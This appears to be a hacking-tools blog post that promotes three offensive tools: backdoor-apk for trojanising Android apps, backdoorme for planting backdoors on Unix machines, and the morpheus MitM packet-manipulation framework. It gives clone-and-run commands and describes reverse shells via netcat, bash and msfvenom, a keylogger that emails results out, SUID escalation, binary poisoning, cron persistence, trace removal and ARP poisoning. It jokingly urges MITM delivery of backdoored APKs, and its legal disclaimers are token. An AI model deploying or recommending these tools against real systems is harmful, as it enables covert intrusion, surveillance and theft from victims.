The recompiled APK will be found in the ‘original/dist’ directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection at the specified IP and port.
Usage:

git clone https://github.com/dana-at-cp/backdoor-apk && cd backdoor-apk
cd backdoor-apk
./backdoor-apk.sh [your apk file]

Update:
git pull origin master

Now you can upload it using MITM technique :-) (Just for education purpose right?yeah.. lets rock)

Source: https://github.com/dana-at-cp | Our Post Before

LEGAL DISCLAMER
The author does not hold any responsibility about the bad use of this script, remmember that attacking targets without prior concent its ilegal and punish by law, this script was build to show how resource files can automate tasks.

Changelog backdoorme 8/12/2016:
+ backdoors; python 3.5 for travis, fixed mixed tabs/spaces.
+ target.py, requirements.txt, start.py, modules; python3 support, howto install using virtualenv.
+ compatible with python 2.7
+ python3 support, howto install using virtualenv.

Backdoorme is a powerful utility capable of backdooring Unix machines with a slew of backdoors. Backdoorme uses a familiar metasploit interface with tremendous extensibility.
Backdoorme relies on having an existing SSH connection or credentials to the victim, through which it will transfer and deploy any backdoors. In the future, this reliance will be removed as the tool is expanded.

backdoorme

Backdoors are organized by category:
+ Auxiliary
*** keylogger – Adds a keylogger to the system and gives the option to email results back to you.
*** simplehttp – installs python’s SimpleHTTP server on the client.
+ user – adds a new user to the target.
*** web – installs an Apache Server on the client.
+ Escalation
*** setuid – the SetUID backdoor works by setting the setuid bit on a binary while the user has root acccess, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unpriviledged user and still be able to run nano (or any chosen binary) as root. (‘nano /etc/shadow’). Note that root access is initially required to deploy this escalation backdoor.
*** shell – the shell backdoor is a priviledge escalation backdoor, similar to (but more specific than) it’s SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use, while SSHed in as an unpriviledged user, simply run “.bash -p”, and you will have root access.
+ Shell
*** bash – uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash.
*** bash2 – a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side.
*** metasploit – employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell.
*** netcat – uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell.
*** netcat_traditional – utilizes netcat-traditional’s -e option to create a reverse shell.
*** perl – a script written in perl which redirects output to bash, and renames the process to look less conspicuous.
*** php – runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web module
*** pupy – uses n1nj4sec’s Pupy backdoor, found at https://github.com/n1nj4sec/pupy.
*** python – uses a short python script to perform commands and send output back to the user.
*** web – ships a web server to the target, then uploads msfvenom’s php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor.
+ Access
*** remove_ssh – removes the ssh server on the client. Often good to use at the end of a backdoorme session to remove all traces.
*** ssh_key – creates RSA key and copies to target for a passwordless ssh connection.
*** ssh_port – Adds a new port for ssh.
+ Windows
*** windows – Uses msfvenom to create a windows backdoor.

Modules include:
* Poison
+-+ Performs bin poisoning on the target computer – it compiles an executable to call a system utility and an existing backdoor.
+-+ For example, if the bin poisoning module is triggered with “ls”, it would would compile and move a binary called “ls” that would run both an existing backdoor and the original “ls”, thereby tripping a user to run an existing backdoor more frequently.
* Cron
+-+ Adds an existing backdoor to the root user’s crontab to run with a given frequency.
* Web
+-+ Sets up a web server and places a web page which triggers the backdoor.
+-+ Simply visit the site with your listener open and the backdoor will begin.
* User
+-+ Adds a new user to the target.
* Startup
+-+ Allows for backdoors to be spawned with the bashrc and init files.
* Whitelist
+-+ Whitelists an IP so that only that IP can connect to the backdoor.

Requirement:
+ All Linux Support
+ Metasploit Framework

Usage and Download from source:

howto install using virtualenv:
sudo apt-get install python3 python3-pip python3-tk nmap
cd backdoorme/
pip3 install virtualenv
virtualenv --python=python3.5 env
source env/bin/activate

git clone https://github.com/Kkevsterrr/backdoorme && cd backdoorme
(env) $ pip install -r requirements.txt
python master.py

Upgrade: git pull

Source: https://github.com/Kkevsterrr | Our Post Before

LEGAL DISCLAMER:
The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent its illegal and punished by law.

morpheus framework automates tcp/udp packet manipulation tasks by using etter filters to manipulate target requests/responses under MitM attacks replacing the tcp/udp packet contents by our contents befor forward the packet back to the target host…

workflow:
1º – attacker -> arp poison local lan (mitm)
2º – target -> requests webpage from network (wan)
3º – attacker -> modifies webpage response (contents)
4º – attacker -> modified packet its forward back to target host

morpheus ships with some pre-configurated filters but it will allow users to improve them when lunching the attack (morpheus scripting console). In the end of the attack morpheus will revert the filter back to is default stage, this will allow users to improve filters at running time without the fear of messing with filter command syntax and spoil the filter.

morpheus

Framework limitations:
1º – morpheus will fail if target system its protected againt arp poison atacks
2º – downgrade attacks will fail if browser target as installed only-https addon’s
3º – target system sometimes needs to clear netcache for arp poison to be effective
4º – many attacks described in morpheus may be droped by target HSTS detection sys.

Dependencies:
+ Nmap
+ Zenity
+ Ettercap
+ Apache2

Use and Download:

git clone https://github.com/r00t-3xp10it/morpheus && morpheus
./morpheus.sh

Source: https://github.com/r00t-3xp10it/morpheus